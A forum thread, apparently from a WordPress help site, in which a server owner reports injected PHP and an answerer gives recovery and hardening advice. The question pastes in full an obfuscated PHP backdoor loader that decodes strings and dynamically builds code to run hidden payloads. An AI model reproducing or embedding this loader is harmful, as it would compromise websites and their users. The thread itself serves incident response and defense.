My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.
Obfuscated code has been appended to all files (including WP core/plugin/theme and non-WP stuff) for which the content begins with a php command (and not simply all files with a .php suffix).
It doesn’t seem to affect the rendered page, and what little I know suggests it’s a backdoor/trojan – which is about the limit of my knowledge.
Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).
I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.
I want to find the extent of the damage, the cause, and prevent a re-occurence.
It’s fairly simple (though time consuming) to replace the obviously-changed files, and this I’ll do.
My sql db backups seem to be ‘clean’ – but I don’t know enough to be sure.
I’m perhaps wrongly assuming the cause to be WP-related, but don’t know if it might instead have been through password-guessing or other.
Constructive suggestions appreciated. Please and thanks.
Update: having been asked about the extra code, it’s added below. I didn’t originally include it, because it didn’t seem appropriate (not worth the effort of decoding, without which probably little to be gained).
$zbdcvsv = 'tj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|w6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>37 x41 107 x45 116 x54"]); if ((strstr($uas," x) or (strstr($uas," x63 150 x72 157 x6d 145")rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-tvodujpo! x24- x24y7 x24- x24*67]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_6R85,67R37,18R#>q%V<*#fopoV;ho))!gj!<*#cd2bge56+99386 x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uft!*uyfu x27k:!ftmf!}Zqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%-%bT-%hW~%fdy)##-!#~<p3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cI<pd%w6Z6<.5`hA x27pd%66d 163 x69 145")) or (strstr($uas," x72 1668M4P8]37]278]225]241]334]368]322]3]364]6]283]427]3w6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`as," x61 156 x64 162 x6f 151 x64")x65 141 x74 145 x5f 146 x75 1} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:745]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%)udfoopdXA x22)7gj6<*QDU`MPT7-NBx273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x% x24- x24*<!~! x24/%t2w/**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmFSUT`LDPT7-UFOJ`GB)fubfsdtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPF8 124 x54 120 x5f 125 x53 105 x52 1#00#W~!%t2w)##Qtjw)#]XA x27K6< x7fw6*3qj%7> x22) or (strstr($uas," x66 151 x72 145 x66 157 x78")))9y]g2y]#>>*4-1-bubE{h%)82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7tolower($_SERVER[" x4 x3a 61 x31")) or (strstr($ujyf`x x22l:!}V;3q%}U;yk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.f<! x24- x24gps)%j>1<%j=tj{fpg) x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Yp { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=str8:56985:6197g:74985-)% x24- x24y4 x24- x24]y8 x24- <.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdX9#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]4b!>!%yy)#}#-# x24- x24-tumjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CW]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjutmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)pp5.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>62]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:7592P4]D6#<%G]y6d]281Ld]2x24]26 x24- x24<%j,,*!| x24- x24g5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepjepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tut!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y8mg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fub24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/3vd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x2sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudo]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6 $vbpgblb("", $gamgsii); $eutnyme();}}vg x22)!gj}1~!<2p% x7f!~!<##!>!2p%ZfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/NJU,6<*27-SFGTOBSUOSVUFS,6<*mdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-Kmgoj{h1:|:*mmvo:>:iuhofm%:-dovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%t%:osvufs:~:<*9-1-r%)s%>/h%sqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsc^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^72qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA >j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{he(array_map("zkglakb",str_split("%tjw!>!#]y84]275]y83]248 { $vbpgblb = " x63 162 x27pd%6<pd%w6Z6<.2`hA x27pd%6<C x27pd%6|6.7eu{66~67<&if((function_exists(" x6f 142 x5f 163 x74 141 x72 164jQeTQcOc/#00#W~!Ydrr)%rsutcvt)fubmgoj{hA!osvufs!~<3,j%2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D]252]y85]256]y6g]257]y86]2%:|:**t%)m%=*h%)m%):fm2bd%-#1GO x22#)fepmqyjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#4#-#D#-#W#-#C#-#O#-#N#*-!%24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x2 x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$eutnyme =osvufs!|ftmf!~<**9.-j%-bubE{h%)1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%de>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#gxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68396]373P6]36]73]83]238M7]381]211Mpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`ms`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufld56 x63 164 x69 157 x6e"; function zkglakb($n){return chr(ord($n)-1);} 2!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x24- x24-!% xK)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1sv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7f<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*3]273]y76]277#<!%t2w>#]y74]273]y76%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%):<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:rI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%") && (!isset($GLOBALS[" x61 156 x75 156 x61"]))))bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{f;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/}c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUU,;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` x5<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?h%h00#*<%nfd)##Qtpz)#]341]8@error_reporting(0); $gamgsii = implodStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSgneiijtn'; $rymqhdk=explode(chr((436-316)),substr($zbdcvsv,(39702-33682),(130-96))); $oulclf = $rymqhdk[0]($rymqhdk[(6-5)]); $ezqcuyal = $rymqhdk[0]($rymqhdk[(10-8)]); if (!function_exists('rieqim')) { function rieqim($eebvtvdx, $wgctulke,$hoxaoipzz) { $iopacym = NULL; for($cisysje=0;$cisysje<(sizeof($eebvtvdx)/2);$cisysje++) { $iopacym .= substr($wgctulke, $eebvtvdx[($cisysje*2)],$eebvtvdx[($cisysje*2)+(3-2)]); } return $hoxaoipzz(chr((27-18)),chr((535-443)),$iopacym); }; } $luxvad = explode(chr((164-120)),'3719,53,5370,50,1678,47,1466,21,1251,35,166,47,680,43,1487,28,813,34,213,45,1333,51,3641,24,847,29,4735,70,5982,38,3584,57,2914,58,658,22,5867,36,3665,54,5077,46,69,45,4938,50,4988,25,3153,62,972,32,1161,25,1307,26,3507,36,1004,66,3473,34,5781,45,1776,39,1537,55,2025,56,1186,65,3081,29,5013,64,773,40,4672,63,4466,59,2789,61,4805,67,4227,31,3795,31,3543,41,5196,50,4576,61,5903,53,2568,55,1384,23,2850,64,3010,35,5123,39,3934,21,3045,36,5462,60,3359,55,4525,51,1095,66,501,67,409,23,5634,57,5301,69,432,49,0,69,481,20,5584,50,5691,52,876,61,2623,48,3215,27,2411,49,3110,43,5522,62,2147,40,4322,63,379,30,2460,40,1515,22,2081,66,3242,52,2500,68,5162,34,3886,26,335,44,3294,27,5246,55,3912,22,3955,64,2240,46,5743,38,4872,66,4044,52,1999,26,3321,38,1745,31,2378,33,306,29,1592,30,1070,25,1622,56,589,69,3772,23,4385,50,1815,67,4096,69,1286,21,1407,59,1725,20,258,48,2286,70,114,52,1882,58,3826,60,2356,22,937,35,5420,42,568,21,5956,26,723,50,4435,31,1940,59,2741,48,2187,53,4258,64,5826,41,3414,59,4637,35,2671,70,4019,25,4165,62,2972,38'); $rlojefjp = $oulclf("",rieqim($luxvad,$zbdcvsv,$ezqcuyal)); $oulclf=$zbdcvsv; $rlojefjp(""); $rlojefjp=(658-537); $zbdcvsv=$rlojefjp-1
2 Answers
My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.
OK, it happens. Not the end of the world.
Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).
It may be that someone tried to attack your service provider. It is quite uncommon to have the 200 user permission.
In Linux there are two methods to change the file.php permissions.
-rwxrwxrwx file.php
- Symbolic method
- Absolute Value method
The symbolic method is for geeks such as David MacKenzie who wrote chmod
tool, and we will only speak in absolute value method.
The permission of the following file:
-rwxrwxrwx file.php
is 777.
Apparently your files were 200 like this:
--w------- file.php
4 means Read,
2 means Write
1 means Execute
Looks like the hacker got your root access.
I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.
I would not bother with that. I would focus on recovery. Otherwise, you will just loose precious time.
I want to find the extent of the damage, the cause and prevent a re-occurrence.
Correct, I will focus only on prevention.
If your hosting provider doesn’t provide the feedback this was their fault, then this may be your fault.
Have you used the latest version of PHP?
Check out this URL and ensure that in 2016 — 207 security flaws were found in PHP.
http://www.cvedetails.com/product/128/PHP-PHP.html?vendor_id=74
PHP is getting there, but you need constantly to upgrade the version.
Have you used software auto upgrades?
But not only PHP, you need to create automatic updates for the whole web server. This is very important.
Occasionally, there are new vulnerabilities found for CentOS, or Ubuntu you are running. And I was a witness of some great problems, just because the OS was not up to date with security updates.
In Ubuntu you would do something like
sudo apt-get update
sudo unattended-upgrade
somewhere in cron job, or
unattended-upgrade --dry-run --debug
To test the upgrade.
If you like to make upgrades to work as a service, you may try
dpkg-reconfigure unattended-upgrades
You would generally need to do that if your hosting company is not doing this automatically. Please check.
Have you used file change detection ?
Part of the iThemes security plugin you already use is File change detection. This is very important to have set since all the security analytics mention this is a key feature. However, from there you will need to pay attention to files updated. It is important to keep the number of the folders low and to set not to be informed based on the extension of the files. Typically you don’t need to track images.
Did anyone found your log files ?
Log files should be prohibited in general via .htaccess. If you are in Nginx, then in Nginx config file. There are certain backup plugins that use wp-content
to store the log files. Some of these do have weak naming convention and scouts may get your logs, with the information about your web server.
The extension of log files may not always be .log. It may be log.1 and like. Keep that in mind.
Can WP SCAN
detect your passwords and users
Use WP SCAN tool and check if it can crack your passwords.
You may consider .htaccess rule to prevent WordPress username enumeration if you don’t have any side effects.
RewriteCond %{QUERY_STRING} author=d
RewriteRule ^ /? [L,R=301]
Are your gates wide open?
You may consider closing your mysql port if this is open.
PORT STATE SERVICE
3306/tcp open mysql
Some services such as mysql should not have open ports, like in the example above. You will need to search the web for the good for the good port scanner.
Also, your login form should have the login limit count, as well as your web server SSH and FTP channels.
The another gate is xmlrpc-php. If you don’t need that you may try to eliminate it, because this would be the place where someone may try to log in.
Have you had a firewall .htaccess ?
The sixth generation of the firewall from the perishable press is not in constraint with your .htaccess file at all. https://perishablepress.com/6g/
It includes empty bots, and bad bots removal. As I checked it should work without interfering with the existing .htaccess rules.
You should test this in low traffic time, or on the development server, and possible use all the tips from there. Should be easy, just copy and paste.
Have you used RIPS to test your plugins and themes?
This will allow you to scann plugins and themes from your http(s)://domain.com/rips/index.php
You can download it from here and extract it to the same level as WordPress:
Then check this out. Query Monitor plugin is perfect, but for the other one the tool found security problems.
I tested nextgen-gallery
and query-monitor
plugins. Look what I found.
There are sometimes false positives this tool may provide you, but in general, you will have the feedback.
So the final advice for you.
You don’t know if your MySQL database is clean. You should probably export all the articles using standard WordPress export and create the new one.
You should install new plugins and new theme. You may even start with the new clean VPS. On Linode this is just few clicks.
You should start with the new WordPress installation for sure..
Probably you may even change the hosting if you determine they are not reliable.
The hosting provider may provide you some feedback from your web server Logs if this is the part of the service, so you can understand what was the problem better.
Anyhow — step by step.
Also, please check my other answer I provided to @Rahul, it may be good for prevention.